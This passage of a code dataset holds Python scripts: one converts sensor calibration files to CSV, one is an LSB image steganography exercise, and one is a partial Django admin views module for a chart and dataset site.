wl, eno3, eswa, di\n else:\n # Checks failed, user can try again or cancel...\n print(\"Whoa! I couldn't parse that file.\")\n if get_user(\"Would you like to select another calibration file? Enter [Y] or N... 
\", \"defaultY\"):\n # User wants to try again...\n continue\n else:\n # User cancels...\n return False\n\ndef save_cal_file(cal_data, serial_number, lwl, uwl):\n \"\"\"\n Writes calibration data to a new file in the required format. Prompts\n user for output file.\n\n cal_data - tuple returned by load_cal_file()\n serial_number - user-provided string\n lwl - lower wl limit CONSTANT\n uwl - upper wl limit CONSTANT\n \"\"\"\n cal_temp, filedate, wl, eno3, eswa, di = cal_data\n\n fname_sn = serial_number[-4:].zfill(5)\n fname_date = filedate.strftime(\"%Y%m%d\")\n\n while True:\n outfile = filedialog.asksaveasfilename(initialfile=(\"CGINS-NUTNRB-%s__%s.csv\" % (fname_sn, fname_date)), defaultextension=\".csv\")\n # User cancelled...\n if not outfile:\n if not get_user(\"Would you like to cancel? Enter Y or [N]... \", \"defaultN\"):\n continue\n else:\n return False\n\n # Filename was chosen by user...\n with open(outfile, 'w', newline='') as newfile:\n writer = csv.writer(newfile)\n writer.writerow([\"serial\", \"name\",\"value\",\"notes\"])\n writer.writerow([serial_number, \"CC_cal_temp\", cal_temp,\"\"])\n writer.writerow([serial_number, \"CC_di\", json.dumps(di),\"\"])\n writer.writerow([serial_number, \"CC_eno3\", json.dumps(eno3), \"\"])\n writer.writerow([serial_number, \"CC_eswa\", json.dumps(eswa), \"\"])\n writer.writerow([serial_number, \"CC_lower_wavelength_limit_for_spectra_fit\", lwl, \"\"])\n writer.writerow([serial_number, \"CC_upper_wavelength_limit_for_spectra_fit\", uwl, \"\"])\n writer.writerow([serial_number, \"CC_wl\", json.dumps(wl), \"\"])\n\n print(\"New calibration file saved successfully. You should examine the file for errors.\")\n return True\n\ndef main():\n \"\"\"Main program logic\"\"\"\n while True:\n # Prompt user for serial number...\n serial_number = get_user(\"Enter the NUTNR-B serial number... \", \"str\")\n\n # A suddenly appearing dialog window might be confusing.\n # Prepare user for what is about to happen...\n input(\"In the next step, select the vendor provided calibration file. Press ENTER to continue...\")\n\n # Get the values we want from the calibration file...\n cal_data = load_cal_file()\n if not cal_data:\n # User cancelled...\n break\n\n input(\"In the next step, you will save the new formatted calibration file. Press ENTER to continue...\")\n \n if not save_cal_file(cal_data, serial_number, LOWER_WL_LIMIT, UPPER_WL_LIMIT):\n print(\"Operation cancelled\")\n\n # Prompt user to create a new cal file...\n if get_user(\"Would you like to create a new calibration file? [Y] or N... 
\", \"defaultY\"):\n continue\n\n print(\"Good bye!\")\n return\n\n##\n## Main\n## ====\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cal_nutnrb.py","file_name":"cal_nutnrb.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261892634","text":"import time\nimport argparse\nimport matplotlib.pyplot as plt\nimport multiprocessing as mp\nimport os\nimport sys\nimport threading\nimport array\nbarrera = threading.Barrier(3)\nbody_list = []\nfrom eleminar import eliminar_comentarios\nfrom separar import separar\nfrom bits import estego_mensaje\n\n\n\ndef modificar_rojo(b_mensaje):\n global body_list\n a = 0\n \n #print(\"HILO ROJO\")\n #print(b_mensaje)\n\n\n inicio = 0 + (3*(int(args.offset)))\n fin = inicio+len(b_mensaje)*(int(args.interleave)*3)\n step = int(args.interleave)*9\n \n #print(\"rojo\",inicio)\n\n for b in range(inicio,fin,step):\n \n z=0\n \n #print(\"rojo:\",b)\n #print(\"b=\",body_list[b])\n #print(\"a=\",a)\n #print(\"bits=\",b_mensaje[a])\n \n if body_list[b] %2 == 0 and b_mensaje[a] == 0 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 1 and z !=1:\n z=1\n pass\n \n elif body_list[b] %2 == 0 and b_mensaje[a] == 1 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n \n elif body_list[b] %2 == 1 and b_mensaje[a] == 0 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n \n\n #print(\"new valor:\",body_list[b])\n #print(\"----------------\")\n \n a = a+3\n\n barrera.wait()\n\n new_image = open(\"\"+args.output+\".ppm\", \"ab\")\n body = array.array('B', body_list)\n body.tofile(new_image)\n new_image.close()\n\n\ndef modificar_verde(b_mensaje):\n global body_list\n a = 1\n \n #print(\"HILO VERDE\")\n #print(b_mensaje)\n\n inicio = 4 + (3*(int(args.offset)) + ((int(args.interleave)-1)*3))\n if int(args.interleave) == 1:\n inicio = 4 + (3*(int(args.offset)))\n fin = inicio+len(b_mensaje)*(int(args.interleave)*3)\n step = int(args.interleave)*9\n\n #print(\"verde:\",inicio)\n\n if len(b_mensaje) %3 == 1:\n fin = fin - step\n \n for b in range(inicio,fin,step):\n\n z=0\n \n #print(\"verde:\",b)\n #print(\"b=\",body_list[b])\n #print(\"a=\",a)\n #print(\"bit=\",b_mensaje[a])\n \n if body_list[b] %2 == 0 and b_mensaje[a] == 0 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 1 and z !=1:\n z=1\n pass\n \n elif body_list[b] %2 == 0 and b_mensaje[a] == 1 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 0 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n \n \n #print(\"new valor:\",body_list[b])\n #print(\"----------------\")\n \n a = a+3\n\n barrera.wait()\n\ndef modificar_azul(b_mensaje):\n global body_list\n a = 2\n\n #print(\"HILO AZUL\")\n #print(b_mensaje)\n\n inicio = 8 + (3*(int(args.offset)) + ((int(args.interleave)+int(args.interleave)-2)*3))\n if int(args.interleave) == 1:\n inicio = 8 + (3*(int(args.offset)))\n fin = inicio+len(b_mensaje)*(int(args.interleave)*3)\n step = int(args.interleave)*9\n\n #print(\"azul:\",inicio)\n\n if len(b_mensaje) %3 == 1:\n fin = fin - step\n elif len(b_mensaje) %3 == 2:\n fin = fin - step\n\n for b in range(inicio,fin,step):\n z=0\n \n #print(\"azul:\",b)\n #print(\"a=\",a)\n #print(\"bits=\",b_mensaje[a])\n #print(body_list[b])\n \n if body_list[b] %2 == 0 and b_mensaje[a] == 0 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 1 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 0 and b_mensaje[a] == 1 and z 
!=1:\n z=1\n body_list[b] = body_list[b] + 1\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 0 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n\n #print(\"new valor:\",body_list[b])\n #print(\"----------------\")\n\n a = a+3\n \n barrera.wait()\n\nif __name__ == \"__main__\":\n start_time = time.time()\n\n parser = argparse.ArgumentParser(usage=\"./esteganografia.py [-h] -s SIZE -f FILE -m FILE -f PIXELS -i PIXELS -o FILE2\")\n parser.add_argument(\"-f\", \"--file\", type=str, required=True, help=\"Archivo portador .ppm\")\n parser.add_argument(\"-s\", \"--size\", type=int, default=1024, help=\"Bloque de lectura\")\n parser.add_argument(\"-m\", \"--message\", type=str, help=\"Mensaje esteganografico\")\n parser.add_argument(\"-e\", \"--offset\", type=str, help=\"Mensaje offset en pixels del inicio del raster\")\n parser.add_argument(\"-i\", \"--interleave\", type=str, help=\"Interleave de modificacion en pixel\")\n parser.add_argument(\"-o\", \"--output\", type=str, default=\"mensaje_oculto\", help=\"Estego-mensaje\")\n args = parser.parse_args()\n\n #Manejo de errores\n\n if args.size <= 0:\n print(\"El tamano de lectura [-s] no puede ser negativo\")\n sys.exit()\n\n if int(args.offset) < 0 or int(args.interleave) < 0:\n print(\"El offset o interleave [-e -i] no puede ser negativos\")\n sys.exit()\n\n try:\n archivo = open(args.file,\"rb\")\n except FileNotFoundError:\n print(\"Archivo no encontrado\")\n sys.exit()\n\n name_file = len(args.file)\n if args.file[(name_file-3):name_file] != \"ppm\":\n print(\"El archivo -f debe ser .ppm\")\n sys.exit()\n\n name_file3 = len(args.message)\n if args.message[(name_file3-3):name_file3] != \"txt\":\n print(\"El archivo -m debe ser .txt\")\n sys.exit()\n\n\n archivo_mensaje = args.message\n\n b_mensaje,lista = estego_mensaje(archivo_mensaje)\n\n archivo = open(args.file,\"rb\")\n imagen_read = archivo.read(1024)\n imagen, ancho, alto = eliminar_comentarios(imagen_read)\n header = separar(imagen)\n \n #Verifico el tamaño de la imagen\n\n if ancho*alto < int(args.offset) + len(b_mensaje) * int(args.interleave):\n print(\"La imagen no tiene la cantidad necesaria de pixels para ocultar su mensaje\")\n sys.exit()\n\n #Coloco el puntero al inicio del cuerpo\n \n inicio_comentario = imagen_read.find(b\"\\n#\")\n fin_comentario = imagen_read.find(b\"\\n\", inicio_comentario + 1)\n tamano_comentario = fin_comentario - inicio_comentario\n inicio_body=len(header)+tamano_comentario\n archivo.seek(inicio_body)\n\n while True:\n lectura = archivo.read(args.size)\n for elemento in lectura:\n body_list.append(elemento)\n if not lectura:\n break\n\n new_image = open(\"\"+args.output+\".ppm\", \"w\")\n compu = \"#UMCOMPU2 \" + args.offset + \" \" + args.interleave + \" \" + str(len(lista)) + \"\\n\"\n new_image.write(header[:3])\n new_image.write(compu)\n new_image.write(header[3:])\n new_image.close()\n\n hilo_rojo = threading.Thread(target= modificar_rojo, args=(b_mensaje,))\n hilo_verde = threading.Thread(target= modificar_verde, args=(b_mensaje,))\n hilo_azul = threading.Thread(target= modificar_azul, args=(b_mensaje,))\n\n hilo_rojo.start()\n hilo_verde.start()\n hilo_azul.start()\n\n hilo_rojo.join()\n hilo_verde.join()\n hilo_azul.join()\n \n if hilo_rojo.is_alive()== False:\n print(\"Termino el Hilo Rojo...\")\n\n if hilo_verde.is_alive()== False:\n print(\"Termino el hilo Verde...\")\n\n if hilo_azul.is_alive()== False:\n print(\"Termino el Hilo Azul...\")\n\n\n \n \n print(\"Se genero correctamente\")\n print(\"--- %s segundos ---\" % (time.time() - 
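One real hazard in the steganography record above: in `modificar_rojo` and `modificar_verde`, an even pixel that must carry a 1-bit is decremented, so a pixel value of 0 becomes -1, and `array.array('B', body_list)` then raises OverflowError (`modificar_azul` increments in that case, which always stays in range). A parity write that can never leave 0..255, as a sketch:

def set_lsb(value, bit):
    # clear bit 0, then set it to the message bit; the result differs
    # from `value` by at most one and never leaves the byte range
    return (value & ~1) | bit

Each four-way if/elif parity block above collapses to `body_list[b] = set_lsb(body_list[b], b_mensaje[a])`.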
start_time))","sub_path":"tps/tp2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184627167","text":"import copy\nimport datetime\nimport json\nimport os\nimport re\nimport csv\nimport glob\nimport os\nimport CloudFlare\nfrom unidecode import unidecode\nfrom io import StringIO\nfrom urllib.parse import urlparse\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.views import login as loginview\nfrom django.db.models import Q\nfrom django.db import connection\nfrom django.db import transaction\nfrom django.http import HttpRequest, HttpResponseRedirect, HttpResponse, HttpResponseNotFound, JsonResponse, QueryDict, StreamingHttpResponse\nfrom django.template.response import TemplateResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.crypto import get_random_string\nfrom .forms import InviteUserForm, InvitedUserRegisterForm\nfrom .models import Chart, Variable, User, UserInvitation, Logo, ChartSlugRedirect, ChartDimension, Dataset, Setting, DatasetCategory, DatasetSubcategory, Entity, Source, VariableType, DataValue, License\nfrom owid_grapher.views import get_query_string, get_query_as_dict\nfrom typing import Dict, Union\nfrom django.db import transaction\n\ndef custom_login(request: HttpRequest):\n \"\"\"\n Redirects to index page if the user is already logged in\n :param request: Request object\n :return: Redirects to index page if the user is logged in, otherwise will show the login page\n \"\"\"\n if request.user.is_authenticated():\n return HttpResponseRedirect(reverse('listcharts'))\n else:\n return loginview(request)\n\n\ndef listcharts(request: HttpRequest):\n charts = Chart.objects.all().order_by('-last_edited_at')\n allvariables = Variable.objects.all()\n vardict = {}\n for var in allvariables:\n vardict[var.pk] = {'id': var.pk, 'name': var.name}\n chartlist = []\n for chart in charts:\n each = {}\n each['id'] = chart.pk\n each['published'] = chart.published\n each['starred'] = chart.starred\n each['name'] = chart.name\n each['type'] = chart.show_type()\n each['slug'] = chart.slug\n each['notes'] = chart.notes\n each['origin_url'] = chart.origin_url\n each['last_edited_at'] = chart.last_edited_at\n if chart.last_edited_by:\n each['last_edited_by'] = chart.last_edited_by.name\n else:\n each['last_edited_by'] = None\n each['variables'] = []\n configfile = json.loads(chart.config)\n for chartvar in configfile['chart-dimensions']:\n if vardict.get(int(chartvar['variableId']), 0):\n each['variables'].append(vardict[int(chartvar['variableId'])])\n chartlist.append(each)\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse(chartlist, safe=False)\n else:\n return render(request, 'admin.charts.html', context={'current_user': request.user.name,\n 'charts': chartlist,\n })\n\n\ndef storechart(request: HttpRequest):\n if request.method == 'POST':\n chart = Chart()\n data = json.loads(request.body.decode('utf-8'))\n return savechart(chart, data, request.user)\n else:\n return HttpResponseRedirect(reverse('listcharts'))\n\n\ndef createchart(request: HttpRequest):\n\n data = editor_data()\n logos = []\n for each in list(Logo.objects.filter(name='OWD')):\n logos.append(each.svg)\n\n chartconfig = {}\n chartconfig['logosSVG'] = logos\n chartconfig_str = 
json.dumps(chartconfig)\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse({'data': data, 'config': chartconfig_str}, safe=False)\n else:\n return render(request, 'admin.edit_chart.html', context={'current_user': request.user.name,\n 'data': data, 'chartconfig': chartconfig_str,\n })\n\n\ndef editor_data():\n data = {}\n data['logos'] = []\n\n logos = Logo.objects.all()\n for each in logos:\n data['logos'].append(each.name)\n\n variable_query = Variable.objects.all().select_related()\n query_result = []\n for each in variable_query:\n query_result.append({'name': each.name, 'id': each.pk, 'unit': each.unit, 'description': each.description,\n 'dataset': each.fk_dst_id.name, 'category': each.fk_dst_id.fk_dst_cat_id.name,\n 'subcategory': each.fk_dst_id.fk_dst_subcat_id.name, 'namespace': each.fk_dst_id.namespace})\n optgroups = {}\n\n for result in query_result:\n if not optgroups.get(result['subcategory'], 0):\n optgroup = {}\n optgroup['name'] = result['subcategory']\n optgroup['namespace'] = result['namespace']\n optgroup['variables'] = []\n optgroups[result['subcategory']] = optgroup\n\n newresult = copy.deepcopy(result)\n if result['name'] != result['dataset']:\n newresult['name'] = result['dataset'] + ' - ' + result['name']\n\n optgroups[newresult['subcategory']]['variables'].append(newresult)\n\n namespaces = Dataset.objects.values('namespace').distinct()\n\n data['namespaces'] = namespaces\n data['optgroups'] = optgroups\n return data\n\n\ndef editchart(request: HttpRequest, chartid: Union[str, int]):\n try:\n chartid = int(chartid)\n except ValueError:\n return HttpResponseNotFound('Invalid chart id!')\n\n try:\n chart = Chart.objects.get(pk=chartid)\n except Chart.DoesNotExist:\n return HttpResponseNotFound('Invalid chart id!')\n\n data = editor_data()\n chartconfig = json.dumps(chart.get_config())\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse({'data': data, 'config': chartconfig}, safe=False)\n else:\n return render(request, 'admin.edit_chart.html', context={'current_user': request.user.name,\n 'data': data, 'chartconfig': chartconfig})\n\n\ndef savechart(chart: Chart, data: Dict, user: User):\n isExisting = chart.id != None\n\n if data.get('published'):\n if ChartSlugRedirect.objects.filter(~Q(chart_id=chart.pk)).filter(Q(slug=data['slug'])):\n return HttpResponse(\"This chart slug was previously used by another chart: %s\" % data[\"slug\"], status=402)\n elif Chart.objects.filter(~Q(pk=chart.pk)).filter(Q(slug=data['slug'])):\n return HttpResponse(\"This chart slug is currently in use by another chart: %s\" % data[\"slug\"], status=402)\n elif chart.published and chart.slug and chart.slug != data['slug']:\n # Changing the slug of an already published chart-- create a redirect\n try:\n old_chart_redirect = ChartSlugRedirect.objects.get(slug=chart.slug)\n old_chart_redirect.chart_id = chart.pk\n old_chart_redirect.save()\n except ChartSlugRedirect.DoesNotExist:\n new_chart_redirect = ChartSlugRedirect()\n new_chart_redirect.chart_id = chart.pk\n new_chart_redirect.slug = chart.slug\n new_chart_redirect.save()\n\n chart.name = data[\"title\"]\n data.pop(\"title\", None)\n\n chart.type = data[\"chart-type\"]\n data.pop(\"chart-type\", None)\n\n chart.notes = data[\"internalNotes\"]\n data.pop(\"internalNotes\", None)\n\n chart.slug = data[\"slug\"]\n data.pop(\"slug\", None)\n\n if data[\"published\"]:\n chart.published = data[\"published\"]\n data.pop(\"published\", None)\n\n data.pop(\"logosSVG\", None)\n\n dims = []\n 
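`listcharts`, `createchart`, and `editchart` all branch on the same URL test to decide between a JSON payload and a rendered template. The idiom, pulled out for clarity (a sketch, not a helper the module actually defines):

from urllib.parse import urlparse

def wants_json(request):
    # the admin routes expose ".json" variants of each page
    return '.json' in urlparse(request.get_full_path()).path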
i = 0\n\n chart.config = json.dumps(data)\n chart.last_edited_at = timezone.now()\n chart.last_edited_by = user\n chart.save()\n\n for dim in data[\"chart-dimensions\"]:\n newdim = ChartDimension()\n newdim.order = i\n newdim.chartId = chart\n newdim.color = dim.get('color', \"\")\n newdim.tolerance = dim.get('tolerance', None)\n newdim.targetyear = dim.get('targetYear', None)\n newdim.displayname = dim.get('displayName', \"\")\n newdim.isProjection = dim.get('isProjection', False)\n newdim.unit = dim.get('unit', None)\n newdim.property = dim.get('property', None)\n newdim.variableId = Variable.objects.get(pk=int(dim.get('variableId', None)))\n dims.append(newdim)\n i += 1\n\n for each in ChartDimension.objects.filter(chartId=chart.pk):\n each.delete()\n for each in dims:\n each.save()\n\n # Remove any old image exports as they will no longer represent the new chart state\n if isExisting:\n for path in glob.glob(os.path.join(settings.BASE_DIR, \"public/exports/\", chart.slug, \"*\")):\n os.remove(path)\n\n # Purge the Cloudflare cache for the chart config url\n # Also purge the html for some common query string urls to update the meta tags\n # TODO: a job queue / coverage of more urls with query strings\n if settings.CLOUDFLARE_KEY:\n config_url = f\"{settings.CLOUDFLARE_BASE_URL}/config/{chart.id}.js\"\n chart_url = f\"{settings.CLOUDFLARE_BASE_URL}/{chart.slug}\"\n urls_to_purge = [config_url, chart_url, chart_url + \"?tab=chart\", chart_url + \"?tab=map\", chart_url + \".csv\", chart_url + \".png\", chart_url + \".svg\"]\n cf = CloudFlare.CloudFlare(email=settings.CLOUDFLARE_EMAIL, token=settings.CLOUDFLARE_KEY)\n cf.zones.purge_cache.delete(settings.CLOUDFLARE_ZONE_ID, data={ \"files\": urls_to_purge })\n\n return JsonResponse({'success': True, 'data': {'id': chart.pk}}, safe=False)\n\n\ndef managechart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n if request.method == 'PUT':\n data = json.loads(request.body.decode('utf-8'))\n return savechart(chart, data, request.user)\n if request.method == 'POST':\n data = QueryDict(request.body.decode('utf-8'))\n if data.get('_method', '0') == 'DELETE':\n chart.delete()\n messages.success(request, 'Chart deleted successfully')\n return HttpResponseRedirect(reverse('listcharts'))\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showchartinternal', args=(chartid,)))\n\n\ndef showchart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n if request.method != 'GET':\n return JsonResponse(chart.get_config(), safe=False)\n else:\n # this part was lifted directly from the public facing side\n # so if anything changes there, be sure to make the same changes here\n configfile = chart.get_config()\n canonicalurl = request.build_absolute_uri('/') + chart.slug\n baseurl = request.build_absolute_uri('/') + chart.slug\n\n chartmeta = {}\n\n title = configfile['title']\n title = re.sub(\"/, \\*time\\*/\", \" over time\", title)\n title = re.sub(\"/\\*time\\*/\", \"over time\", title)\n chartmeta['title'] = title\n if configfile.get('subtitle', ''):\n chartmeta['description'] = configfile['subtitle']\n else:\n chartmeta['description'] = 'An interactive visualization from Our 
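`savechart` above replaces a chart's dimensions by deleting the old `ChartDimension` rows one at a time and then saving the new ones one at a time, so a concurrent reader can briefly observe a chart with no dimensions. A sketch of the same swap done atomically and in two queries, using imports the module already has:

from django.db import transaction

with transaction.atomic():
    ChartDimension.objects.filter(chartId=chart.pk).delete()
    ChartDimension.objects.bulk_create(dims)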
World In Data.'\n query_string = get_query_string(request)\n if query_string:\n canonicalurl += '?' + query_string\n chartmeta['canonicalUrl'] = canonicalurl\n if query_string:\n imagequery = query_string + '&' + \"size=1200x800&v=\" + chart.make_cache_tag()\n else:\n imagequery = \"size=1200x800&v=\" + chart.make_cache_tag()\n\n chartmeta['imageUrl'] = baseurl + '.png?' + imagequery\n\n configpath = \"%s/config/%s.js\" % (settings.BASE_URL, chart.pk)\n\n response = TemplateResponse(request, 'show_chart.html',\n context={'chartmeta': chartmeta, 'configpath': configpath,\n 'query': query_string\n })\n return response\n\n\n@transaction.atomic\ndef starchart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n\n if request.method == 'POST':\n Chart.objects.update(starred=False)\n chart.starred = True\n chart.save()\n return JsonResponse({'starred': True}, safe=False)\n\n\ndef unstarchart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n if request.method == 'POST':\n chart.starred = False\n chart.save()\n return JsonResponse({'starred': False}, safe=False)\n\n\ndef importdata(request: HttpRequest):\n datasets = Dataset.objects.filter(namespace='owid').order_by('name').values()\n datasetlist = []\n for each in datasets:\n each['fk_dst_subcat_id'] = each['fk_dst_subcat_id_id'] # XXX\n each['created_at'] = str(each['created_at'])\n each['updated_at'] = str(each['updated_at'])\n datasetlist.append(each)\n\n vartypes = Variable.objects.values()\n vartypeslist = []\n for each in vartypes:\n each['created_at'] = str(each['created_at'])\n each['updated_at'] = str(each['updated_at'])\n each['uploaded_at'] = str(each['uploaded_at'])\n vartypeslist.append(each)\n\n source_template = dict(Setting.objects.filter(meta_name='sourceTemplate').values().first())\n source_template['created_at'] = str(source_template['created_at'])\n source_template['updated_at'] = str(source_template['updated_at'])\n\n categories = DatasetSubcategory.objects.all().select_related().order_by('fk_dst_cat_id__pk').order_by('pk')\n category_list = []\n for each in categories:\n category_list.append({'name': each.name, 'id': each.pk, 'parent': each.fk_dst_cat_id.name})\n entitynames = Entity.objects.all()\n entitynameslist = []\n entitycodeslist = []\n for each in entitynames:\n entitynameslist.append(each.name)\n entitycodeslist.append(each.code)\n all_entitynames = entitynameslist + entitycodeslist\n\n data = {'datasets': datasetlist, 'categories': category_list, 'varTypes': vartypeslist, 'sourceTemplate': source_template,\n 'entityNames': all_entitynames}\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse(data, safe=False)\n else:\n return render(request, 'admin.importer.html', context={'current_user': request.user.name,\n 'importerdata': json.dumps(data)})\n\n\ndef store_import_data(request: HttpRequest):\n if request.method == 'POST':\n try:\n with transaction.atomic():\n data = json.loads(request.body.decode('utf-8'))\n\n datasetmeta = data['dataset']\n entities = data['entities']\n entitynames = data['entityNames']\n years = data['years']\n variables = data['variables']\n\n datasetprops = {'name': datasetmeta['name'],\n 'description': 
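In `showchart` above, the two title substitutions wrap their patterns in `/.../` like JavaScript regex literals; Python's `re.sub` treats those slashes as literal characters, so the replacements only fire on titles that actually contain slashes. The intended patterns are presumably:

title = re.sub(r", \*time\*", " over time", title)
title = re.sub(r"\*time\*", "over time", title)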
datasetmeta['description'],\n 'fk_dst_cat_id': DatasetSubcategory.objects.get(pk=datasetmeta['subcategoryId']).fk_dst_cat_id,\n 'fk_dst_subcat_id': DatasetSubcategory.objects.get(pk=datasetmeta['subcategoryId'])\n }\n\n if datasetmeta['id']:\n dataset = Dataset.objects.get(pk=datasetmeta['id'])\n Dataset.objects.filter(pk=datasetmeta['id']).update(updated_at=timezone.now(), **datasetprops)\n else:\n dataset = Dataset(**datasetprops)\n dataset.save()\n\n dataset_id = dataset.pk\n\n codes = Entity.objects.filter(validated=True).values('name', 'code')\n\n codes_dict = {}\n\n for each in codes:\n codes_dict[each['code']] = each['name']\n\n entitynames_list = Entity.objects.values_list('name', flat=True)\n\n for i in range(0, len(entitynames)):\n name = entitynames[i]\n if codes_dict.get(name, 0):\n entitynames[i] = codes_dict[name]\n\n entitynames_to_insert = []\n\n for each in entitynames:\n if each not in entitynames_list:\n entitynames_to_insert.append(each)\n\n alist = [Entity(name=val, validated=False) for val in entitynames_to_insert]\n\n Entity.objects.bulk_create(alist)\n\n codes = Entity.objects.values('name', 'id')\n\n entitiy_name_to_id = {}\n\n for each in codes:\n entitiy_name_to_id[each['name']] = each['id']\n\n source_ids_by_name: Dict[str, str] = {}\n\n for variable in variables:\n source_name = variable['source']['name']\n if source_ids_by_name.get(source_name, 0):\n source_id = source_ids_by_name[source_name]\n else:\n if variable['source']['id']:\n source_id = variable['source']['id']\n else:\n source_id = None\n source_desc = variable['source']['description']\n if source_id:\n Source.objects.filter(pk=source_id).update(updated_at=timezone.now(), **variable['source'])\n else:\n new_source = Source(datasetId=dataset_id, name=source_name, description=source_desc)\n new_source.save()\n source_id = new_source.pk\n source_ids_by_name[source_name] = source_id\n\n values = variable['values']\n variableprops = {'name': variable['name'], 'description': variable['description'], 'unit': variable['unit'],\n 'coverage': variable['coverage'], 'timespan': variable['timespan'],\n 'fk_var_type_id': VariableType.objects.get(pk=3),\n 'fk_dst_id': Dataset.objects.get(pk=dataset_id),\n 'sourceId': Source.objects.get(pk=source_id),\n 'uploaded_at': timezone.now(),\n 'updated_at': timezone.now(),\n 'uploaded_by': request.user\n }\n if variable['overwriteId']:\n Variable.objects.filter(pk=variable['overwriteId']).update(**variableprops)\n varid = variable['overwriteId']\n else:\n varid = Variable(**variableprops)\n varid.save()\n varid = varid.pk\n DataValue.objects.filter(fk_var_id=Variable.objects.get(pk=varid)).delete()\n\n newdatavalues = []\n\n for i in range(0, len(years)):\n if values[i] == '':\n continue\n\n newdatavalues.append(DataValue(fk_var_id=Variable.objects.get(pk=varid),\n fk_ent_id=Entity.objects.get(pk=entitiy_name_to_id[entitynames[entities[i]]]),\n year=years[i],\n value=values[i]))\n\n if len(newdatavalues) > 10000:\n DataValue.objects.bulk_create(newdatavalues)\n newdatavalues = []\n\n if len(newdatavalues) > 0:\n DataValue.objects.bulk_create(newdatavalues)\n with connection.cursor() as cursor:\n cursor.execute(\"DELETE FROM sources WHERE sources.id NOT IN (SELECT variables.sourceId FROM variables)\")\n\n return JsonResponse({'datasetId': dataset_id}, safe=False)\n except Exception as e:\n if len(e.args) > 1:\n error_m = str(e.args[0]) + ' ' + str(e.args[1])\n else:\n error_m = e.args[0]\n return HttpResponse(error_m, status=500)\n\n\ndef listdatasets(request: 
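The import loop above bounds memory by flushing `DataValue` rows through `bulk_create` whenever the buffer passes 10,000 entries, plus a final flush for the remainder. The same batching pattern in isolation (sketch; `incoming_rows` is a hypothetical iterable of unsaved `DataValue` instances):

batch = []
for value in incoming_rows:
    batch.append(value)
    if len(batch) >= 10000:
        DataValue.objects.bulk_create(batch)
        batch = []
if batch:                               # flush whatever is left over
    DataValue.objects.bulk_create(batch)

One easy win the loop leaves on the table: it calls `Variable.objects.get(pk=varid)` for every single row even though `varid` is fixed per variable; since `fk_var_id` is a ForeignKey, Django also accepts the raw id through the `fk_var_id_id` attribute, which avoids the repeated fetch entirely.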
HttpRequest):\n variables = Variable.objects.filter(fk_dst_id__namespace='owid').select_related('fk_dst_id').order_by('-fk_dst_id__updated_at')\n datasets: Dict = {}\n for each in variables:\n if each.uploaded_by:\n uploaded_by = each.uploaded_by.name\n else:\n uploaded_by = None\n if datasets.get(each.fk_dst_id.pk, 0):\n datasets[each.fk_dst_id.pk]['variables'].append({'name': each.name, 'id': each.pk,\n 'uploaded_at': str(each.uploaded_at),\n 'uploaded_by': uploaded_by})\n else:\n datasets[each.fk_dst_id.pk] = {'name': each.fk_dst_id.name, 'id': each.fk_dst_id.pk, 'variables': [{'name': each.name,\n 'id': each.pk,\n 'uploaded_at': str(\n each.uploaded_at),\n 'uploaded_by': uploaded_by\n }]}\n dataset_list = []\n for value in sorted(datasets.keys(), reverse=True):\n dataset_list.append(datasets[value])\n return render(request, 'admin.datasets.html', context={'current_user': request.user.name,\n 'datasets': dataset_list})\n\n\ndef showdataset(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.get(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n dataset_dict = {'id': dataset.pk, 'name': dataset.name, 'category': dataset.fk_dst_cat_id.name,\n 'subcategory': dataset.fk_dst_subcat_id.name,\n 'description': dataset.description}\n\n dataset_vars = Variable.objects.filter(fk_dst_id=dataset)\n dataset_chartdims = ChartDimension.objects.filter(variableId__in=dataset_vars)\n dataset_chart_ids = []\n for each in dataset_chartdims:\n dataset_chart_ids.append(each.chartId.pk)\n dataset_charts = Chart.objects.filter(pk__in=dataset_chart_ids).values()\n return render(request, 'admin.datasets.show.html', context={'current_user': request.user.name,\n 'dataset': dataset_dict,\n 'variables': dataset_vars.values(),\n 'charts': dataset_charts,\n })\n\n\ndef editdataset(request: HttpRequest, datasetid: str):\n try:\n dataset = 